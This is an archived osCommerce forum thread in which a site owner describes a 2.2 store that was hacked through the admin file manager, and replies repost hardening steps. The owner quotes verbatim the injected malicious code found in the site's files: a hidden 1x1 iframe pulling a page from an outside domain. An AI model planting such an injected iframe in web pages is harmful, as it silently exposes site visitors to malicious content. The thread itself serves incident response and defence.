Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

osCommerce site hacked via injection


protogabe

Recommended Posts

One of my sites, an osCommerce 2.2 site that gets pretty heavy traffic was hacked to pieces yesterday. The client first complained that they could no longer update their inventory, and reported a rather odd error. Later in the day it was reported that new products could not be added at all. I check the server files and noticed files modified on Jan 22nd. I search the files and noticed they were all cut off at random points and this line was injected:

 

<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

 

What scares us the most is that even files in the root folder before public_html were altered and injected with that. Reviewing logs I was able to find the IP and referrer URL and it turns out there was a direct call to the catalog/admin/file-manager.php file from the IP in question (out of Santa Monica, California).

 

Our admin side of the site is protected by .htpasswd so I wonder if the password had been comprimised and gathered info -- noone had the password but me and the site owner who hadnt give it out. My question is how the hell did anyone get access to the files and/or has anyone ever seen this?

 

Thanks,

ProtoGabe

www.protoactive.com

Link to comment
Share on other sites

Thanks Jack. Looks like exactly what I am experiencing. Just to reprint the best advice from that thread here so its easier to query:

 

Your ongoing problem is - how did they get the code into the site in the first place?

 

I cross indexed file mod dates with access logs and found the IP of the offender, ran a traceroute and tracked it to Santa Monica, California. We're in New York so is wasn't a local attack. How they got the passwords is still a big question mark but according to the logs they directedly access file-manager.php in admin, and that's it, no other activity logged, which tells me it was not human, because a human would fuss around on other pages, is this a plausible theory?

 

Here's the advice from Jacks thread I am doing as we speak, and always remember to BACKUP, if this happens to you:

 

Until you know that they'll be able to do it again and your work will be wasted.

 

1. Change all user names and passwords, including the db user (don't forget the configure.php file entries).

 

2. Make sure your site uses at least osCommerce 2.2 MS2 (060817), and if it doesn't then upgrade.

 

3. Make sure that no folder has permissions above 755. If your hosting requires permissions of 777 on folders then move hosting.

 

4. Delete the filemanager.php file from your osCommerce admin panel.

 

5. Rename the 'admin' folder to something unique (not 'admin2' or 'newadmin'), and then change the entries for /admin/ in admin/includes/configure.php to /new_name/

 

6. Password Protect the renamed 'admin' folder with a new user and password.

 

6. Run a full virus scan, Malware and SpyBot scan on your PC and any PC which is used to FTP files to the site - as this may be the source of the injection.

Link to comment
Share on other sites

  • 3 years later...

Even though this is a long time after the fact, oddly enough, searching Google for results on osCommerce hacks, this discussion is almost near the top so I thought it best to place this link here to the discussion of how to secure your v2.2 range of osCommerce websites.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...